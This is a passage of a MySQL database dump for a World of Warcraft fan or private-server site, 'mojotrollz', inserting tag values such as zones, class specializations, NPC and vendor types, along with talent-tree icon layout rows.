(3441, 2, 'General\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3442, 2, 'The Reservoir', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3443, 2, 'The Hatchery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3444, 2, 'The Comb', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3445, 2, 'Watchers\' Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3446, 2, 'Twilight\'s Run', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3447, 2, 'Ortell\'s Hideout', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3448, 2, 'Scarab Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3449, 2, 'General\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3450, 2, 'The Reservoir', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3451, 2, 'The Hatchery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3452, 2, 'The Comb', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3453, 2, 'Watchers\' Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3454, 2, 'Ruins of Ahn\'Qiraj', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3455, 2, 'The North Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3456, 2, 'Naxxramas', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (0, 3, 'blizzlike', 'content is blizzlike'); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 3, 'not blizzlike', 'content is not blizzlike'); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 4, 'Deploy', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 10, 'Blizzlike', 'Blizzlike Content'); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 10, 'Scaled', 'Scaled Blizzlike Content'); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 10, 'Custom', 'Custom Content'); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 10, 'Bugged', 'Bugged Contend'); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (0, 11, 'lvl 1-10', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 11, 'lvl 11-20', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 11, 'lvl 21-30', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 12, 'basic information', 'basic faq topic'); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 20, 'Warrior Arms', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 20, 'Warrior Fury', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 20, 'Warrior Protection', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 20, 'Paladin Holy', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (5, 20, 'Paladin Protection', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (6, 20, 'Paladin Retribution', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (7, 20, 'Hunter Beast Mastery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (8, 20, 'Hunter Marksmanship', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (9, 20, 'Hunter Survival', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (10, 20, 'Rogue Assassination', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (11, 20, 'Rogue Combat', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (12, 20, 'Rogue Subtlety', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (13, 20, 'Priest Discipline', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (14, 20, 'Priest Holy', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (15, 20, 'Priest Shadow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (16, 20, 'Shaman Elemental', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (17, 20, 'Shaman Enhancement', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (18, 20, 'Shaman Restoration', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (19, 20, 'Mage Arcane', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (20, 20, 'Mage Fire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (21, 20, 'Mage Frost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (22, 20, 'Warlock Affliction', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (23, 20, 'Warlock Demonology', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (24, 20, 'Warlock Destruction', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (25, 20, 'Druid Balance', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (26, 20, 'Druid Feral', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (27, 20, 'Druid Restoration', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 21, 'Mojo S', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 21, 'Mojo Q1', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 21, 'Mojo Q2', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (7, 21, 'Blizz D50', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (8, 21, 'Blizz D55', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (9, 21, 'Blizz D60', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (10, 21, 'Blizz T0', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (20, 21, 'Blizz T0.5', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (25, 21, 'Mojo D60', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (30, 21, 'Blizz T1', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (35, 21, 'Mojo T1.5', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (40, 21, 'Blizz T2', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (43, 21, 'Mojo T2.5', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (45, 21, 'Blizz AQ40', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (50, 21, 'Blizz T3', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (55, 21, 'Mojo T3.5', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (0, 30, 'Normal', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 30, 'Elite', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 30, 'Rare Elite', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 30, 'Boss', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 30, 'Rare', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 31, 'Duplicate', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 31, 'Despawn', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 31, 'Spawn', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 31, 'Position', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (5, 31, 'Drop', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 32, 'Flightmaster', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 32, 'Bank', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 32, 'Auctioneer', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 32, 'Questmob', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (5, 32, 'QuestNPC', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (6, 32, 'Non-Use-NPC', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (7, 32, 'Class Trainer', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (8, 32, 'Critter', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (10, 32, 'Guildmaster', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (11, 32, 'Innkeeper', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (12, 32, 'Weapon Master', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (13, 32, 'Profession Trainer', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (14, 32, 'BattlegroundMaster', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (15, 32, 'Stable Master', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (16, 32, 'Riding Master', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (0, 33, 'Nothing of that', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 33, 'Classtrainer - Warlock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 33, 'Classtrainer - Warrior', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 33, 'Classtrainer - Rogue', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 33, 'Classtrainer - Mage', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (5, 33, 'Classtrainer - Priest', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (6, 33, 'Classtrainer - Druid', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (7, 33, 'Classtrainer - Hunter', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (8, 33, 'Classtrainer - Shaman', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (9, 33, 'Classtrainer - Paladin', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (20, 33, 'Profession - Cook', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (21, 33, 'Profession - First Aid', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (22, 33, 'Profession - Fishing', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (23, 33, 'Profession - Alchemy', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (24, 33, 'Profession - Enchanting', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (25, 33, 'Profession - Leatherwork', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (26, 33, 'Profession - Blacksmithing', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (27, 33, 'Profession - Tailorwork', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (28, 33, 'Profession - Mining', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (29, 33, 'Profession - Skinning', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (30, 33, 'Profession - Herbalism', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (31, 33, 'Profession - Engineering', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1, 35, 'No Vendor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2, 35, 'General Goods', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3, 35, 'Food', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (4, 35, 'PvP-Vendor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (5, 35, 'Armor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (6, 35, 'Weapon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (7, 35, 'Profession-Vendor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (8, 35, 'Tabard Vendor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (9, 35, 'Trade Supplies', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (10, 35, 'Class-Vendor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (11, 35, 'Mount-Vendor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (12, 35, 'Reagents', ''); /*!40000 ALTER TABLE `mojotrollz_tags_value` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.mojotrollz_talent_icon CREATE TABLE IF NOT EXISTS `mojotrollz_talent_icon` ( `class` int(10) NOT NULL, `tree` int(10) NOT NULL, `row` int(10) NOT NULL, `column` int(10) NOT NULL, `type` text NOT NULL, `border` text NOT NULL, `icon` text, `max` int(11) NOT NULL, `parent_row` int(11) DEFAULT NULL, `parent_column` int(11) DEFAULT NULL, PRIMARY KEY (`class`,`tree`,`row`,`column`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.mojotrollz_talent_icon: ~577 rows (ungefähr) /*!40000 ALTER TABLE `mojotrollz_talent_icon` DISABLE KEYS */; INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 1, 1, 'talent_icon', 'icon_border_green', 'ability_rogue_ambush.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 1, 2, 'talent_icon', 'icon_border_green', 'ability_parry.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 1, 3, 'talent_icon', 'icon_border_green_down', 'ability_gouge.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'ability_warrior_charge.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 2, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_enchantarmor.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 2, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 2, 4, 'talent_icon', 'icon_border_grey', 'ability_thunderclap.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'inv_sword_05.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 3, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_blessingofstamina.png', 1, 2, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 3, 3, 'talent_icon', 'icon_border_grey_inc_top_down', 'ability_backstab.png', 3, 1, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 4, 2, 'talent_icon', 'icon_border_grey', 'inv_axe_09.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 4, 3, 'talent_icon', 'icon_border_grey_inc', 'ability_searingarrow.png', 2, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 5, 1, 'talent_icon', 'icon_border_grey', 'inv_axe_06.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'ability_rogue_slicedice.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 5, 3, 'talent_icon', 'icon_border_grey', 'inv_mace_01.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 5, 4, 'talent_icon', 'icon_border_grey', 'inv_sword_27.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 6, 1, 'talent_icon', 'icon_border_grey', 'inv_weapon_halbard_01.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 6, 3, 'talent_icon', 'icon_border_grey', 'ability_shockwave.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 1, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'ability_warrior_savageblow.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_nature_purge.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 1, 3, 'talent_icon', 'icon_border_green', 'ability_rogue_eviscerate.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 2, 2, 'talent_icon', 'icon_border_grey', 'ability_warrior_warcry.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_stoneclawtotem.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'ability_warrior_cleave.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_deathscream.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 3, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_summonimp.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 3, 4, 'talent_icon', 'icon_border_grey', 'ability_warrior_battleshout.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 4, 1, 'talent_icon', 'icon_border_grey', 'ability_dualwield.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 4, 2, 'talent_icon', 'icon_border_grey', 'inv_sword_48.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 4, 3, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_unholyfrenzy.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 5, 1, 'talent_icon', 'icon_border_grey', 'ability_warrior_decisivestrike.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_deathpact.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 5, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 5, 4, 'talent_icon', 'icon_border_grey', 'ability_rogue_sprint.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 6, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_ancestralguardian.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 6, 3, 'talent_icon', 'icon_border_grey_inc', 'ability_ghoulfrenzy.png', 5, 4, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 2, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_bloodlust.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 1, 2, 'talent_icon', 'icon_border_green_down', 'inv_shield_06.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 1, 3, 'talent_icon', 'icon_border_green', 'spell_nature_mirrorimage.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 2, 1, 'talent_icon', 'icon_border_grey_down', 'ability_racial_bloodrage.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 2, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_devotion.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 2, 4, 'talent_icon', 'icon_border_grey', 'spell_magic_magearmor.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 3, 1, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_ashestoashes.png', 1, 2, 1); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 3, 2, 'talent_icon', 'icon_border_grey_inc', 'ability_defend.png', 3, 1, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 3, 3, 'talent_icon', 'icon_border_grey', 'ability_warrior_revenge.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 3, 4, 'talent_icon', 'icon_border_grey', 'ability_warrior_innerrage.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 4, 1, 'talent_icon', 'icon_border_grey', 'ability_warrior_sunder.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 4, 2, 'talent_icon', 'icon_border_grey', 'ability_warrior_disarm.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_reincarnation.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 3, 5, 1, 'talent_icon', 'icon_border_grey', 'ability_warrior_shieldwall.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (1, 